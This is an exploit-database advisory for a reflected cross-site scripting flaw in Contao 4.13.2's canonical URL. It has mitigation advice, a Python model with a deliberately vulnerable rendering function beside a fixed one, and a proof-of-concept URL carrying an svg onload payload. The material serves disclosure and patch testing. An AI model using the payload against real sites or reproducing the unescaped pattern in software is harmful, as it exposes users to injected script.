vendor:
Contao
by:
Chetanya Sharma
5.5
CVSS
MEDIUM
Cross-Site Scripting (XSS)
79
CWE
Product Name: Contao
Affected Version From: 4.13.2
Affected Version To: 4.13.2
Patch Exists: YES
Related CVE: CVE-2022-1588
CPE: a:contao:contao:4.13.2
Other Scripts:
Platforms Tested: Kali OS
2022

Contao 4.13.2 – Cross-Site Scripting (XSS)

Contao 4.13.2 is vulnerable to reflected cross-site scripting (XSS). The canonical URL that Contao writes into the page head (the href of the canonical link tag) is derived from the request URL and is not properly escaped, so a double quote in the requested path terminates the attribute and whatever follows is rendered as new markup. An attacker who gets a victim to open a crafted URL can therefore execute arbitrary JavaScript in the context of the victim's browser session on the affected site.

Mitigation:

To mitigate this vulnerability, upgrade to a patched version of Contao. The vendor has published a security advisory and a fix; update affected installations to Contao 4.13.3 or later. After updating, request the proof-of-concept URL below and confirm that the injected characters appear only in escaped or percent-encoded form in the response.
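The flaw described above, as an added example that is not Contao's own code: Contao is written in PHP, so this Python model shows the vulnerable pattern (the request path concatenated verbatim into the canonical href) beside a hardened rendering, together with a check that can be run over a response captured from the PoC URL. The host, the exact tag layout and all function names are assumptions made for illustration.

```python
# Added example (not Contao's code): a minimal model of the canonical-URL XSS in
# Contao 4.13.2 and of a hardened rendering, plus a check for a captured response.
# Contao itself is PHP; this Python models the pattern. The base URL, tag layout
# and helper names are assumptions for illustration.
from html import escape
from html.parser import HTMLParser
from urllib.parse import quote

BASE_URL = "https://localhost"                       # constructed test host
POC_PATH = '/contao/"><svg//onload=alert(112233)>'    # path taken from the PoC URL
MARKER = '"><svg//onload=alert(112233)>'              # what an unescaped reflection looks like


def render_canonical_vulnerable(base_url: str, request_path: str) -> str:
    """Deliberately vulnerable: the request path is concatenated into the href
    attribute verbatim, so a double quote in the path terminates the attribute
    and whatever follows becomes new markup."""
    return f'<link rel="canonical" href="{base_url}{request_path}">'


def render_canonical_fixed(base_url: str, request_path: str) -> str:
    """Hardened rendering with two independent layers:
    1. percent-encode the path so the canonical value is a valid URL in which
       characters such as " < > ( ) cannot appear raw (a real implementation
       would also normalise already-encoded input instead of re-encoding it);
    2. HTML-escape the final attribute value, which is the fix that matters
       even if layer 1 is skipped or bypassed."""
    url = base_url + quote(request_path, safe="/")
    return f'<link rel="canonical" href="{escape(url, quote=True)}">'


class _TagCollector(HTMLParser):
    """Collects start-tag names, roughly as a browser tokenizer would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[str] = []

    def handle_starttag(self, tag: str, attrs) -> None:
        self.tags.append(tag)


def injected_tags(html_fragment: str) -> list[str]:
    """Return every start tag the tokenizer finds. For a sound canonical tag
    this is just ['link']; an extra entry such as 'svg' means the path broke
    out of the attribute and injected markup."""
    collector = _TagCollector()
    collector.feed(html_fragment)
    collector.close()
    return collector.tags


def reflects_payload_unescaped(response_body: str, marker: str = MARKER) -> bool:
    """Quick check for a captured response (e.g. saved with curl from the PoC
    URL): True only if the raw breakout sequence is present. An HTML-escaped
    (&quot;&gt;&lt;svg) or percent-encoded (%22%3E%3Csvg) reflection is not a hit."""
    return marker in response_body


if __name__ == "__main__":
    for name, render in (("vulnerable", render_canonical_vulnerable),
                         ("fixed", render_canonical_fixed)):
        tag = render(BASE_URL, POC_PATH)
        print(f"{name:10s} {tag}")
        print(f"{'':10s} tags seen: {injected_tags(tag)}  "
              f"unescaped reflection: {reflects_payload_unescaped(tag)}")
```

Running it prints both renderings: the vulnerable one tokenizes as a `link` tag followed by an injected `svg` tag carrying the onload handler, while the fixed one is a single `link` tag whose href is `https://localhost/contao/%22%3E%3Csvg//onload%3Dalert%28112233%29%3E`. To check a live instance after patching, save the response to the PoC URL and pass its body to `reflects_payload_unescaped`; a False result together with `injected_tags` returning no unexpected tags means the canonical URL is no longer reflected raw.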

Exploit-DB raw data:

# Exploit Title: Contao 4.13.2 - Cross-Site Scripting (XSS)
# Google Dork: NA
# Date: 04/28/2022
# Exploit Author: Chetanya Sharma @AggressiveUser
# Vendor Homepage: https://contao.org/en/
# Software Link: https://github.com/contao/contao/releases/tag/4.13.2
# Version: [ 4.13.2 ] 
# Tested on: [KALI OS]
# CVE : CVE-2022-1588
# References: 
- https://huntr.dev/bounties/df46e285-1b7f-403c-8f6c-8819e42deb80/
- https://github.com/contao/contao/security/advisories/GHSA-m8x6-6r63-qvj2
- https://contao.org/en/security-advisories/cross-site-scripting-via-canonical-url.html
---------------

Steps to reproduce:
Navigate to the URL below:
URL: https://localhost/contao/"><svg//onload=alert(112233)>